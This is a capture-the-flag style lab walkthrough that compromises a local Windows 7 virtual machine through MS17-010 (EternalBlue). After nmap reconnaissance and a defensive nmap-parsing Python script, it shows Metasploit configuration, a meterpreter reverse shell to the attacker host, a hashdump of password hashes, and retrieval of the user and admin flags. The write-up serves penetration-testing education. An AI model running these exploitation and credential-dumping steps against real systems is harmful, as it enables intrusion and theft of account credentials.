MICROCHOFT MACHINE
The first step was network reconnaissance to identify the target machine. arp-scan was used to find the active hosts on the local network, which confirmed a host at 192.168.88.4.
┌──(luis㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
[sudo] contraseña para luis:
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1 d8:44:89:50:2d:a3 (Unknown)
192.168.88.3 00:e0:4c:97:01:a7 (Unknown)
192.168.88.4 08:00:27:f7:3a:b3 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 3 responded
Once the host was identified, Nmap was used to discover which services were running on the machine. The full-port scan with service detection showed ports 135 (MSRPC), 139 (NetBIOS session service) and 445 (SMB) open, plus a block of high-numbered Windows RPC ports (49152-49157), and fingerprinted the host as MICROCHOFT running Windows 7 to 10.
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 192.168.88.4 -vvv -sV -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 17:15 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 17:15
Scanning 192.168.88.4 [1 port]
Completed ARP Ping Scan at 17:15, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:15
Scanning 192.168.88.4 [65535 ports]
Discovered open port 445/tcp on 192.168.88.4
Discovered open port 135/tcp on 192.168.88.4
Discovered open port 139/tcp on 192.168.88.4
Discovered open port 49152/tcp on 192.168.88.4
Discovered open port 49157/tcp on 192.168.88.4
Discovered open port 49154/tcp on 192.168.88.4
Discovered open port 49153/tcp on 192.168.88.4
Discovered open port 49156/tcp on 192.168.88.4
Discovered open port 49155/tcp on 192.168.88.4
Completed SYN Stealth Scan at 17:15, 13.22s elapsed (65535 total ports)
Initiating Service scan at 17:15
Scanning 9 services on 192.168.88.4
Service scan Timing: About 44.44% done; ETC: 17:17 (0:01:06 remaining)
Completed Service scan at 17:16, 58.61s elapsed (9 services on 1 host)
NSE: Script scanning 192.168.88.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:16
Completed NSE at 17:16, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:16
Completed NSE at 17:16, 0.01s elapsed
Nmap scan report for 192.168.88.4
Host is up, received arp-response (0.00084s latency).
Scanned at 2025-09-25 17:15:20 CEST for 72s
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:F7:3A:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: MICROCHOFT; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.47 seconds
Raw packets sent: 67812 (2.984MB) | Rcvd: 65539 (2.622MB)
Running Nmap again against port 445 with the vuln script category (--script=vuln) shows that the host is vulnerable to MS17-010 (CVE-2017-0143), the SMBv1 remote code execution flaw, as seen below. The other SMB checks report NT_STATUS_ACCESS_DENIED, meaning the unauthenticated check could not complete, so they are inconclusive rather than negative.
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -p 445 192.168.88.4 -vvv --script=vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 17:23 CEST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 10.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Initiating ARP Ping Scan at 17:23
Scanning 192.168.88.4 [1 port]
Completed ARP Ping Scan at 17:23, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:23
Scanning 192.168.88.4 [1 port]
Discovered open port 445/tcp on 192.168.88.4
Completed SYN Stealth Scan at 17:23, 0.02s elapsed (1 total ports)
NSE: Script scanning 192.168.88.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 5.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Nmap scan report for 192.168.88.4
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-09-25 17:23:38 CEST for 5s
PORT STATE SERVICE REASON
445/tcp open microsoft-ds syn-ack ttl 128
MAC Address: 08:00:27:F7:3A:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
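As an added example (not part of the original writeup), the Python script below parses Nmap normal output like the two scans above into structured findings: the open ports with their service names, and each smb-vuln-* host script result with its state, CVE identifiers and risk factor, so that a host exposing vulnerable SMBv1 can be triaged automatically instead of by eye. The sample report is constructed from the results on this page, abbreviated; the function and field names are my own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: an abbreviated Nmap normal-output report of the kind shown
# above (-sV port table followed by --script=vuln host script results).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.88.4
Host is up, received arp-response (0.00084s latency).
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
"""

# One row of the port table: "445/tcp open microsoft-ds syn-ack ttl 128 <version>".
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<detail>.*)$")
# A script result line: "|_name: value" (single line) or "| name:" (a block follows).
SCRIPT_RE = re.compile(r"^\|(?:_| )(?P<name>[\w-]+):\s*(?P<value>.*)$")
# Indented fields inside a vulnerability block.
FIELD_RE = re.compile(r"^\|\s+(?P<key>State|IDs|Risk factor):\s*(?P<value>.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class ScanReport:
    host: str | None = None
    open_ports: dict[int, str] = field(default_factory=dict)  # port -> service name
    scripts: dict[str, dict] = field(default_factory=dict)    # script name -> parsed fields


def parse_nmap(text: str) -> ScanReport:
    """Parse Nmap normal output into open ports and NSE host-script results."""
    report = ScanReport()
    current: str | None = None  # script whose multi-line block we are inside
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report.host = line.split()[-1]
            continue
        m = PORT_RE.match(line)
        if m:
            if m["state"] == "open":
                report.open_ports[int(m["port"])] = m["service"]
            continue
        m = SCRIPT_RE.match(line)
        if m and m["name"].islower():  # NSE script names are lowercase; "VULNERABLE:" is not one
            current = m["name"]
            report.scripts[current] = {"result": m["value"], "state": None, "cves": [], "risk": None}
            if m["value"]:  # one-line result, so no block follows
                current = None
            continue
        m = FIELD_RE.match(line)
        if m and current:
            entry = report.scripts[current]
            if m["key"] == "State":
                entry["state"] = m["value"]
            elif m["key"] == "IDs":
                entry["cves"] = CVE_RE.findall(m["value"])
            else:
                entry["risk"] = m["value"]
    return report


def assess(report: ScanReport) -> list[str]:
    """Defender-side triage: turn the parsed results into actionable findings."""
    findings: list[str] = []
    if 445 in report.open_ports or 139 in report.open_ports:
        findings.append("SMB/NetBIOS (139/445) reachable from the scanning network; "
                        "restrict with the host firewall if not required")
    for name, entry in report.scripts.items():
        if entry["state"] == "VULNERABLE":
            findings.append(f"{name}: VULNERABLE ({', '.join(entry['cves'])}, risk {entry['risk']}); "
                            "apply the vendor patch and disable SMBv1")
        elif entry["result"] == "NT_STATUS_ACCESS_DENIED":
            findings.append(f"{name}: inconclusive, the unauthenticated check was denied")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(finding)
```

The parser keys on Nmap's own layout: script names sit directly after `| ` or `|_`, while the fields of a vulnerability block are indented further, which is why a line such as `|   VULNERABLE:` is not mistaken for a script. A `false` result is a negative check and produces no finding; an access-denied result is reported separately so it is not silently read as "not vulnerable".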
Now open msfconsole and run search ms17-010 to find the exploit module, which is the following:
exploit/windows/smb/ms17_010_eternalblue
msf > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
Next, configure the module as follows:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOSTS 192.168.88.4    (the victim IP)
run    (or exploit)
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.88.6     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
View the full module info with the info, or info -d command.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.88.4
RHOSTS => 192.168.88.4
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.4 yes
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.88.6:4444
[*] 192.168.88.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.88.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.88.4:445 - The target is vulnerable.
[*] 192.168.88.4:445 - Connecting to target for exploitation.
[+] 192.168.88.4:445 - Connection established for exploitation.
[+] 192.168.88.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.4:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.88.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.88.4:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[*] 192.168.88.4:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[+] 192.168.88.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.4:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.4:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.4:445 - Starting non-paged pool grooming
[+] 192.168.88.4:445 - Sending SMBv2 buffers
[+] 192.168.88.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.4:445 - Sending final SMBv2 buffers.
[*] 192.168.88.4:445 - Sending last fragment of exploit packet!
[*] 192.168.88.4:445 - Receiving response from exploit packet
[+] 192.168.88.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.4:445 - Sending egg to corrupted connection.
[*] 192.168.88.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 192.168.88.4
[*] Meterpreter session 1 opened (192.168.88.6:4444 -> 192.168.88.4:49160) at 2025-09-25 17:34:49 +0200
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gotcha! We have just obtained access to the remote machine, as the Meterpreter prompt below shows.
meterpreter >
In addition, from the Meterpreter session we can run the following commands:
sessions   (list the active sessions)
getprivs   (list the privileges the current process holds on the machine)
hashdump   (dump the password hashes of the local user accounts)
shell      (open a command shell on the machine)
msf exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
  Id  Name  Type                     Information                       Connection
  --  ----  ----                     -----------                       ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ MICROCHOFT  192.168.88.6:4444 -> 192.168.88.4:49160 (192.168.88.4)
msf exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
meterpreter > hashdump
Admin:1000:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lola:1001:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::
C:\Windows\system32>cd ..
cd ..
C:\Windows>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\Windows
03/28/2024 06:37 PM <DIR> .
03/28/2024 06:37 PM <DIR> ..
07/14/2009 07:32 AM <DIR> addins
07/14/2009 05:20 AM <DIR> AppCompat
11/21/2010 05:29 AM <DIR> AppPatch
11/21/2010 05:24 AM 71,168 bfsvc.exe
07/14/2009 07:32 AM <DIR> Boot
07/14/2009 07:32 AM <DIR> Branding
07/14/2009 07:32 AM <DIR> Cursors
03/28/2024 06:35 PM <DIR> debug
07/14/2009 07:32 AM <DIR> diagnostics
07/14/2009 07:37 AM <DIR> DigitalLocker
07/14/2009 07:32 AM <DIR> Downloaded Program Files
03/29/2024 02:35 AM 2,790 DtcInstall.log
04/12/2011 10:17 AM <DIR> en-US
11/21/2010 05:24 AM 2,872,320 explorer.exe
07/14/2009 03:39 AM 15,360 fveupdate.exe
04/12/2011 10:30 AM <DIR> Globalization
04/12/2011 10:17 AM <DIR> Help
07/14/2009 03:39 AM 733,696 HelpPane.exe
07/14/2009 03:39 AM 16,896 hh.exe
06/10/2009 10:30 PM 48,223 HomeBasic.xml
07/14/2009 07:37 AM <DIR> IME
09/25/2025 05:14 PM <DIR> inf
07/14/2009 07:32 AM <DIR> L2Schemas
07/14/2009 04:34 AM <DIR> LiveKernelReports
07/14/2009 07:32 AM <DIR> Logs
07/14/2009 01:06 AM 43,131 mib.bin
11/21/2010 05:52 AM <DIR> Microsoft.NET
07/14/2009 04:34 AM <DIR> ModemLogs
06/10/2009 10:36 PM 1,405 msdfmap.ini
07/14/2009 03:39 AM 193,536 notepad.exe
07/14/2009 07:32 AM <DIR> Offline Web Pages
03/28/2024 06:36 PM <DIR> Panther
07/14/2009 07:32 AM <DIR> Performance
11/21/2010 05:47 AM 4,568 PFRO.log
07/14/2009 05:20 AM <DIR> PLA
11/21/2010 05:30 AM <DIR> PolicyDefinitions
09/25/2025 05:39 PM <DIR> Prefetch
07/14/2009 03:39 AM 427,008 regedit.exe
07/14/2009 05:20 AM <DIR> Registration
03/28/2024 06:36 PM <DIR> rescache
07/14/2009 07:32 AM <DIR> Resources
07/14/2009 04:35 AM <DIR> SchCache
07/14/2009 07:32 AM <DIR> schemas
07/14/2009 05:20 AM <DIR> security
07/14/2009 06:45 AM <DIR> ServiceProfiles
04/12/2011 10:17 AM <DIR> servicing
07/14/2009 06:45 AM <DIR> Setup
09/25/2025 06:10 PM 21,917 setupact.log
07/14/2009 06:51 AM 0 setuperr.log
03/28/2024 06:38 PM <DIR> SoftwareDistribution
04/12/2011 10:17 AM <DIR> Speech
11/21/2010 05:24 AM 67,072 splwow64.exe
06/10/2009 10:31 PM 48,201 Starter.xml
07/14/2009 04:36 AM <DIR> system
06/10/2009 11:08 PM 219 system.ini
09/25/2025 05:14 PM <DIR> System32
04/12/2011 10:27 AM <DIR> SysWOW64
07/14/2009 06:57 AM <DIR> TAPI
07/14/2009 07:08 AM <DIR> Tasks
09/25/2025 05:39 PM <DIR> Temp
07/14/2009 04:34 AM <DIR> tracing
03/29/2024 02:34 AM 1,355 TSSysprep.log
06/10/2009 11:41 PM 94,784 twain.dll
07/14/2009 07:32 AM <DIR> twain_32
11/21/2010 05:25 AM 51,200 twain_32.dll
06/10/2009 11:41 PM 49,680 twunk_16.exe
07/14/2009 03:14 AM 31,232 twunk_32.exe
07/14/2009 05:20 AM <DIR> Vss
07/14/2009 07:32 AM <DIR> Web
07/14/2009 07:09 AM 403 win.ini
09/25/2025 05:16 PM 15,859 WindowsUpdate.log
07/14/2009 03:14 AM 9,728 winhlp32.exe
03/28/2024 06:46 PM <DIR> winsxs
06/10/2009 10:52 PM 316,640 WMSysPr9.prx
07/14/2009 03:39 AM 10,240 write.exe
27 File(s) 5,148,631 bytes
50 Dir(s) 24,564,617,216 bytes free
C:\Windows>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\
07/14/2009 05:20 AM <DIR> PerfLogs
07/14/2009 07:09 AM <DIR> Program Files
07/14/2009 06:57 AM <DIR> Program Files (x86)
03/28/2024 06:52 PM <DIR> Users
03/28/2024 06:36 PM 1,449 vboxpostinstall.log
03/28/2024 06:37 PM <DIR> Windows
1 File(s) 1,449 bytes
5 Dir(s) 24,565,141,504 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\Users
03/28/2024 06:52 PM <DIR> .
03/28/2024 06:52 PM <DIR> ..
03/28/2024 06:36 PM <DIR> Admin
03/28/2024 06:52 PM <DIR> Lola
07/14/2009 06:54 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 24,565,141,504 bytes free
C:\Users\Lola>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\Users\Lola
03/28/2024 06:52 PM <DIR> .
03/28/2024 06:52 PM <DIR> ..
03/28/2024 06:52 PM <DIR> Contacts
03/28/2024 06:54 PM <DIR> Desktop
03/28/2024 06:52 PM <DIR> Documents
03/28/2024 06:52 PM <DIR> Downloads
03/28/2024 06:52 PM <DIR> Favorites
03/28/2024 06:52 PM <DIR> Links
03/28/2024 06:52 PM <DIR> Music
03/28/2024 06:52 PM <DIR> Pictures
03/28/2024 06:52 PM <DIR> Saved Games
03/28/2024 06:52 PM <DIR> Searches
03/28/2024 06:52 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 24,564,617,216 bytes free
C:\Users\Lola>cd Desktop
cd Desktop
C:\Users\Lola\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\Users\Lola\Desktop
03/28/2024 06:54 PM <DIR> .
03/28/2024 06:54 PM <DIR> ..
03/28/2024 06:54 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 24,564,408,320 bytes free
Gotcha! We have got the user flag, shown below.
C:\Users\Lola\Desktop>type user.txt
type user.txt
13e624146d31ea232c850267c2745caa
C:\Users\Lola\Desktop>cd C:\Users\Admin\Desktop
cd C:\Users\Admin\Desktop
C:\Users\Admin\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 44E2-21EC
Directory of C:\Users\Admin\Desktop
03/28/2024 06:50 PM <DIR> .
03/28/2024 06:50 PM <DIR> ..
03/28/2024 06:51 PM 32 admin.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24,564,408,320 bytes free
Gotcha! We have got the root (admin) flag, shown below.
C:\Users\Admin\Desktop>type admin.txt.txt
type admin.txt.txt
ff4ad2daf333183677e02bf8f67d4dca
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack